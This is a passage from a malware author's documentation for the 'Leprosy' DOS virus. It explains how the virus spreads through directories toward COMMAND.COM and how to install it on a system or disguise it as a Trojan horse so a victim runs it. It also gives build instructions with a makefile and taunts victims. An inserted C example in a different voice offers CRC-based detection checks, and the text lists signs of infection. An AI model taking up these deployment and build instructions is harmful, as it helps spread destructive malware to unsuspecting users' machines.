shot. When it fails to find any more non-infected files in the
current directory, it will step back into the parent directory,
and try to find some files again there. The current directory
will have changed by the time the virus exits when Leprosy does
this, but hopefully the dumbshit won't catch on. The payback is
that Leprosy might eventually creep up to the root directory and
infect COMMAND.COM, and then the user will be fucked over.
6. RATE OF TRANSMISSION: The AIDS Virus will only infect one
file at a time. Leprosy will infect up to four files each time
it is run.
SETTING UP LEPROSY ON A SYSTEM
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
To install Leprosy onto an un-infected system, all you need
do is run the provided file, LEPROSY.COM, somewhere on that
system, preferably somewhere where it will have access to a lot
of commonly used executables. Alternately, you could infect
some program with an impressive-looking file length and
documentation and send it to someone as a Trojan Horse type
program. Just make sure it gets run.
COMPILING LEPROSY
~~~~~~~~~~~~~~~~~
To assemble the Leprosy .COM file, you will need Turbo C
2.0 and Turbo Assembler. MASM might work, just as long as the
executable file turns out the appropriate length. If the .COM
file doesn't come out to exactly 666 bytes long, then it might
not work properly. C compilers other than Turbo C will probably
not work, since the program makes extensive use of inline
assembler, but versions other than 2.0 will probably be okay.
Just remember -- watch the file length.
The easiest way to re-create Leprosy is to just run MAKE,
and the provided makefile will handle the rest. If you are
compiling it by hand, you should use this makefile as your
guidelines. An important note is that you should not link the
program with the standard Turbo C startup code for the Tiny
memory model; instead, always link it with the provided
alternate startup code. This file, C0T.ASM, is a startup
sequence which gets rid of code to gather command line arguments
and the like, allowing for programs which are essentially as
small as their assembly language counterparts. Just remember,
keep an eye on the executable file size.
WAYS TO SPOT THE VIRUS
~~~~~~~~~~~~~~~~~~~~~~
There are several ways to notice the Leprosy virus on your
system. If small .COM files are increasing in length to 666
bytes, that's your first hint. 666 bytes isn't a very likely
file length, but it's funny, so I'm keeping it that way. Also,
if the current directory changes when you run a program, or you
notice strange "Program too big to fit in memory" errors, that
should tip you off too. Leprosy can also be detected by CRC
checking programs, because it directly modifies the contents of
the files it infects. What is more, Leprosy causes a
distinctive drive noise, sort of a "blickablickablickablicka" on
my hard drive, because it is opening, reading from, writing to,
and closing a number of files very quickly.
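The detection hints above can be turned into two checks, shown here as an added example that is not part of the original Leprosy distribution: a CRC-32 comparison against a known-good baseline that ignores the (preserved) date stamp, and a scan for a phrase stored with 10 added to each byte. The baseline record, the file name TOOL.COM and the sample buffers are constructed for illustration; the encoded string is the fake_msg literal from the source listing.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Bitwise CRC-32 (reflected polynomial 0xEDB88320). */
uint32_t crc32_buf(const unsigned char *data, size_t len) {
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++) {
        crc ^= data[i];
        for (int b = 0; b < 8; b++)
            crc = (crc >> 1) ^ (0xEDB88320u & (0u - (crc & 1u)));
    }
    return ~crc;
}

/* Hypothetical baseline record, taken while the file was known good. */
struct baseline { const char *name; uint32_t crc; long mtime; };

enum verdict { UNCHANGED, CHANGED, CHANGED_STAMP_KEPT };

/* Compare content, never dates: the listing restores the original
   time/date stamp after writing, so an unchanged stamp proves nothing.
   Changed content under an unchanged stamp is the more suspicious case. */
enum verdict check_file(const struct baseline *b, const unsigned char *data,
                        size_t len, long mtime) {
    if (crc32_buf(data, len) == b->crc)
        return UNCHANGED;
    return mtime == b->mtime ? CHANGED_STAMP_KEPT : CHANGED;
}

/* Offset of `phrase` stored with `shift` added to every byte, or -1.
   A plain-text string search misses such data; this one does not. */
long find_shifted(const unsigned char *data, size_t len,
                  const char *phrase, int shift) {
    size_t n = strlen(phrase);
    if (n == 0 || n > len)
        return -1;
    for (size_t i = 0; i + n <= len; i++) {
        size_t j = 0;
        while (j < n && data[i + j] == (unsigned char)(phrase[j] + shift))
            j++;
        if (j == n)
            return (long)i;
    }
    return -1;
}

/* Constructed sample data: a stand-in for a known-good image, and a
   buffer holding four filler bytes followed by the encoded message. */
static const unsigned char CLEAN[] = "constructed known-good program image";
static const unsigned char SAMPLE[] =
    "\x01\x02\x03\x04" "\x17\x14" "Z|yq|kw*~yy*lsq*~y*ps~*sx*wowy|\x83.";
#define CLEAN_LEN  (sizeof CLEAN - 1)
#define SAMPLE_LEN (sizeof SAMPLE - 1)

int main(void) {
    static const char *label[] = { "unchanged", "changed",
                                   "changed, date stamp preserved" };
    struct baseline b = { "TOOL.COM", crc32_buf(CLEAN, CLEAN_LEN), 1000L };

    /* Same recorded mtime, different content. */
    printf("%s: %s\n", b.name, label[check_file(&b, SAMPLE, SAMPLE_LEN, 1000L)]);
    printf("encoded phrase at offset %ld\n",
           find_shifted(SAMPLE, SAMPLE_LEN, "Program too big to fit in memory", 10));
    return 0;
}
```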
ACKNOWLEDGEMENTS
~~~~~~~~~~~~~~~~
I'd like to thank some of the pirate boards in the (415)
area code -- they know who they are.
What is more, I'd like to say that I used the December 26,
1989 issue of PC Magazine, and the book "The NEW Peter Norton
Programmer's Guide to the IBM PC and PS/2" in the process of
writing the Leprosy program. I just thought I'd mention that,
since it kind of makes me laugh to wonder what Peter Norton and
PC Magazine would think if they knew they were partly
responsible for the creation of a virus. HAHA!
Yours truly,
PCM2
P.S. BTW, if Leprosy fails to find any .EXE or .COM files that
aren't infected, but it locates more than 6 executable
files that are already infected with Leprosy, it displays a
message indicating that the system has been infected with
Leprosy, and wishes the user luck. If it can't find any
new files to infect, and only finds 6 or fewer infected
files during its entire run, it just prints out the fake
"Program too big to fit in memory" message again.
# makefile for LEPROSY Virus 1.00 by PCM2
leprosy.com: leprosy.obj c0t.obj
tlink /x /t c0t+leprosy,leprosy,,
c0t.obj: c0t.asm
tasm c0t
leprosy.obj: leprosy.asm
tasm leprosy
leprosy.asm: leprosy.c
tcc -mt -f- -K -S leprosy
